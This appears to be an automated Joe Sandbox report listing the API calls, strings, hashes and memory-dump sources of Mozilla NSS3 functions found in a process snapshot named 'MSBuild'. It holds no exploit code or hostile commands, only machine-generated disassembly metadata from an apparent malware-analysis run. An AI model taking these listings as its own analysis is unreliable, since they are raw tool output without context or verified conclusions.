Part of subcall function 6CC2CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CB9C1A8,?), ref: 6CC2CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CC2CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CD8E

Part of subcall function 6CB505C0: PR_EnterMonitor.NSS3 ref: 6CB505D1
Part of subcall function 6CB505C0: PR_ExitMonitor.NSS3 ref: 6CB505EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CC2CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CC2CE48

Strings

wship6.dll, xrefs: 6CC2CDE3
ws2_32.dll, xrefs: 6CC2CD75
getaddrinfo, xrefs: 6CC2CD88, 6CC2CDF9
freeaddrinfo, xrefs: 6CC2CD9F, 6CC2CE10
getnameinfo, xrefs: 6CC2CDB2, 6CC2CE23

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: f53cd3b62799e728e0d9a564b07f6115d8f8db555451b6b17c5fc271cdcc2341
Instruction ID: 84af758e003913e8f840bcc269875a6debb2cb1d127d1aef9ce8ad2dbe203796
Opcode Fuzzy Hash: f53cd3b62799e728e0d9a564b07f6115d8f8db555451b6b17c5fc271cdcc2341
Instruction Fuzzy Hash: 7C112EFAE0315162FB117E7A7C10AAE3968AF0214CF580535D805D1F00FB29CA2887F6

Function 6CBA4540 Relevance: 25.8, APIs: 17, Instructions: 349COMMON

Download Yara Rule

APIs

PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6CBA4590
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA471C
TlsGetValue.KERNEL32 ref: 6CBA477C
EnterCriticalSection.KERNEL32(?), ref: 6CBA479A
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CBA484A
PK11_FreeSymKey.NSS3(?), ref: 6CBA4858
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA486A
PR_Unlock.NSS3(?), ref: 6CBA487E

Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4

PK11_FreeSymKey.NSS3(?), ref: 6CBA488C
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA489C
PK11_GetInternalSlot.NSS3 ref: 6CBA48B2
PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6CB87F9D), ref: 6CBA48EC
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6CBA492A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA4949
PR_SetError.NSS3(00000000,00000000), ref: 6CBA4977
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA4987
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA499B

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
String ID:
API String ID: 1673584487-0
Opcode ID: 0cf48655e7536dcc0e278a0a4495f8278993454a0ec7b869dadf0630ceed4589
Instruction ID: 33eb3bf6325dc8eb1c88693c5db80da6676014c5c3d7e3262420228fc52e25cb
Opcode Fuzzy Hash: 0cf48655e7536dcc0e278a0a4495f8278993454a0ec7b869dadf0630ceed4589
Instruction Fuzzy Hash: F9E19C75D002959FDB20CF64CC44BAEBBB4EF04308F1081A9E85DA7751EB729A96CF91

Function 6CBC6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CC91DE0,?), ref: 6CBC6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBC6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CBC6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CBC6D82
DER_GetInteger_Util.NSS3(?), ref: 6CBC6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBC6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CBC6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CBC6F19
PK11_DigestBegin.NSS3(00000000), ref: 6CBC6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CBC6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBC7011
PK11_FreeSymKey.NSS3(00000000), ref: 6CBC7033
free.MOZGLUE(?), ref: 6CBC703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CBC7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CBC7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CBC70AF

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 125c32ba3ab29159ba078e04b2a941f56115b91411b529dd94210842c6ce7a19
Instruction ID: dbc4ce0889716bf02d73cb0850ca48c7a530b1cd223ed97e84ba4eefc04f507a
Opcode Fuzzy Hash: 125c32ba3ab29159ba078e04b2a941f56115b91411b529dd94210842c6ce7a19
Instruction Fuzzy Hash: 46A1F7B1B082C19BEB009F24DC85F7B32A4DB8131CF24893AE959DBA91E775D845C753

Function 6CBA25D0 Relevance: 24.3, APIs: 16, Instructions: 284COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6CB7662E,?,?), ref: 6CBA264E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6CB7662E,?,?), ref: 6CBA2670
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6CB7662E,?), ref: 6CBA2684
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6CBA26C2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6CBA26E0
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6CBA26F4
PR_Unlock.NSS3(?), ref: 6CBA274D
PR_SetError.NSS3(00000000,00000000), ref: 6CBA28A9

Part of subcall function 6CBB3440: PK11_GetAllTokens.NSS3 ref: 6CBB3481
Part of subcall function 6CBB3440: PR_SetError.NSS3(00000000,00000000), ref: 6CBB34A3
Part of subcall function 6CBB3440: TlsGetValue.KERNEL32 ref: 6CBB352E
Part of subcall function 6CBB3440: EnterCriticalSection.KERNEL32(?), ref: 6CBB3542
Part of subcall function 6CBB3440: PR_Unlock.NSS3(?), ref: 6CBB355B

PR_Unlock.NSS3(?), ref: 6CBA27A1
PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6CB7662E,?,?,?), ref: 6CBA27B5
PR_Unlock.NSS3(?), ref: 6CBA27CE
TlsGetValue.KERNEL32 ref: 6CBA27E8
EnterCriticalSection.KERNEL32(0000001C), ref: 6CBA2800

Part of subcall function 6CBAF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CBAF854
Part of subcall function 6CBAF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CBAF868
Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CBAF882
Part of subcall function 6CBAF820: free.MOZGLUE(04C483FF,?,?), ref: 6CBAF889
Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CBAF8A4
Part of subcall function 6CBAF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CBAF8AB
Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CBAF8C9
Part of subcall function 6CBAF820: free.MOZGLUE(280F10EC,?,?), ref: 6CBAF8D0

PR_Unlock.NSS3(?), ref: 6CBA2834
TlsGetValue.KERNEL32 ref: 6CBA284E
EnterCriticalSection.KERNEL32(0000001C), ref: 6CBA2866

Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
String ID:
API String ID: 544520609-0
Opcode ID: 6b01eeb5ee2ce0473b1e5350bf868106d361018e8b345fe883c186d65bcee6d6
Instruction ID: 4138c10d869dfed6d62c1ce29130b7224d769a761cb35123bbc1acae8ba0b00e
Opcode Fuzzy Hash: 6b01eeb5ee2ce0473b1e5350bf868106d361018e8b345fe883c186d65bcee6d6
Instruction Fuzzy Hash: C9B10970D04245DFDB00DFA9D888BAEB7B4FF08308F104529E849A7B11E731E946CBA2

Function 6CB8AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CB6AB95,00000000,?,00000000,00000000,00000000), ref: 6CB8AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CB6AB95,00000000,?,00000000,00000000,00000000), ref: 6CB8AF39
PR_Unlock.NSS3(?,?,?,6CB6AB95,00000000,?,00000000,00000000,00000000), ref: 6CB8AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CB6AB95,00000000,?,00000000,00000000,00000000), ref: 6CB8AF69
TlsGetValue.KERNEL32 ref: 6CB8B06B
EnterCriticalSection.KERNEL32(?), ref: 6CB8B083
PR_Unlock.NSS3(?), ref: 6CB8B0A4
TlsGetValue.KERNEL32 ref: 6CB8B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CB8B0D9
PR_Unlock.NSS3 ref: 6CB8B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB8B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB8B182

Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CB8B177

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CB6AB95,00000000,?,00000000,00000000,00000000), ref: 6CB8B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CB6AB95,00000000,?,00000000,00000000,00000000), ref: 6CB8B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CB6AB95,00000000,?,00000000,00000000,00000000), ref: 6CB8B1C2

Part of subcall function 6CBB1560: TlsGetValue.KERNEL32(00000000,?,6CB80844,?), ref: 6CBB157A
Part of subcall function 6CBB1560: EnterCriticalSection.KERNEL32(?,?,?,6CB80844,?), ref: 6CBB158F
Part of subcall function 6CBB1560: PR_Unlock.NSS3(?,?,?,?,6CB80844,?), ref: 6CBB15B2

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 98abcacd4515944822742f89d0bc82067446b89669a0f7469ee8642d2d983da6
Instruction ID: 6dd78c06a39ae11df80b3707b7222245908de2427fd31b758a408012eb5bd825
Opcode Fuzzy Hash: 98abcacd4515944822742f89d0bc82067446b89669a0f7469ee8642d2d983da6
Instruction Fuzzy Hash: 22A1A0B1E012459BEF01AF74DC81AEEBBB4EF04308F144125E915AB751EB31E959CBA2

Function 6CBAE550 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 384COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBAE5A0

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

memcpy.VCRUNTIME140(?,?,?), ref: 6CBAE5F2

Strings

0, xrefs: 6CBAEA4D

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ErrorValuememcpy
String ID: 0
API String ID: 3044119603-4108050209
Opcode ID: dd5d8af71091ed02fcdef93aa22b178a45f5724bb260a5caa8fc445bc582aec9
Instruction ID: 447f2b6ab6770ccb00f67c9c1acde06ddc3963bcc445e9b84d0db79a6c739b87
Opcode Fuzzy Hash: dd5d8af71091ed02fcdef93aa22b178a45f5724bb260a5caa8fc445bc582aec9
Instruction Fuzzy Hash: CEF17C719042999FDB218F64CC80BDE77B5FF49308F0441A8E988A7641E771AEA5CFD1

Function 6CC3A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CC3A4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CC3A4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC3A553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CC3A5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC3A5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC3A60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC3A633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC3A671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CC3A69A

Strings

database corruption, xrefs: 6CC3A627
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC3A61D, 6CC3A68B, 6CC3A6B3
%s at line %d of [%.10s], xrefs: 6CC3A62C

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: 195a631f62a0fe7a2041cce5e98a4cab4fabfa02bcdc6cf993028d4ea8609dea
Instruction ID: 0a57dc6258c2adeaebd9fa9529ba22a473244b7a9338196ae18f045bb5754d72
Opcode Fuzzy Hash: 195a631f62a0fe7a2041cce5e98a4cab4fabfa02bcdc6cf993028d4ea8609dea
Instruction Fuzzy Hash: 385193B1A08311AFDF018F65E890A9A7BF0AB8431CF04986DF84D47651F771D9A4CBA2

Function 6CB645B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6CB61984,?), ref: 6CB645F2
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CB645FB

Part of subcall function 6CBC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC08B4

SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6CB6461E

Part of subcall function 6CBBFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6CB64101,00000000,?,?,?,6CB61666,?,?), ref: 6CBBFCF2

SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6CB64646
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB64662
PR_SetError.NSS3(FFFFE023,00000000), ref: 6CB6467A
PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CB64691
PL_FreeArenaPool.NSS3 ref: 6CB646A3
PL_FinishArenaPool.NSS3 ref: 6CB646AB
free.MOZGLUE(?), ref: 6CB646BC
PORT_ZAlloc_Util.NSS3(?), ref: 6CB646E5
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB64717

Strings

security, xrefs: 6CB645EC

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
String ID: security
API String ID: 3482804875-3315324353
Opcode ID: 029675e115a8a15de0408546e93aaf1475deb6dc0e631549a96b2b6babd4f5a9
Instruction ID: 6f9da372b41535572fd49eb811fe32d310cd5948f825a4a0a5baed4b3260bdad
Opcode Fuzzy Hash: 029675e115a8a15de0408546e93aaf1475deb6dc0e631549a96b2b6babd4f5a9
Instruction Fuzzy Hash: 5D4115B2A047906BE700DB66DC50B5B77A8EF4826CF050668EC19A3F41F730E614CAE7

Function 6CBDAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDADB1

Part of subcall function 6CBBBE30: SECOID_FindOID_Util.NSS3(6CB7311B,00000000,?,6CB7311B,?), ref: 6CBBBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CBDADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CBDAE08

Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBDAE25
PL_FreeArenaPool.NSS3 ref: 6CBDAE63
PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBDAE4D

Part of subcall function 6CAE4C70: TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
Part of subcall function 6CAE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
Part of subcall function 6CAE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDAE93
PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBDAECC
PL_FreeArenaPool.NSS3 ref: 6CBDAEDE
PL_FinishArenaPool.NSS3 ref: 6CBDAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDAEF5
PL_FinishArenaPool.NSS3 ref: 6CBDAF16

Strings

security, xrefs: 6CBDADEE

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: ecea14e7e0557eae322bfe799908813723b4c6767160191abe1d69ead70a8c1e
Instruction ID: fba2e9c0b11dc359c5e129a967a4584c97557f954de2c02f7aa9bd0289733b07
Opcode Fuzzy Hash: ecea14e7e0557eae322bfe799908813723b4c6767160191abe1d69ead70a8c1e
Instruction Fuzzy Hash: 2541F6B6904281A7EB215A249C45BBE32A8EF4171CF250525E815D6F81FB39A648CBD3

Function 6CB96500 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_EncryptFinal), ref: 6CB96526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB96554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB96563

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB96579
PR_LogPrint.NSS3( pLastEncryptedPart = 0x%p,?), ref: 6CB96595
PR_LogPrint.NSS3( pulLastEncryptedPartLen = 0x%p,?), ref: 6CB965B0
PR_LogPrint.NSS3( *pulLastEncryptedPartLen = 0x%x,?), ref: 6CB9661A

Strings

*pulLastEncryptedPartLen = 0x%x, xrefs: 6CB96615
(CK_INVALID_HANDLE), xrefs: 6CB9655C
pulLastEncryptedPartLen = 0x%p, xrefs: 6CB965AB
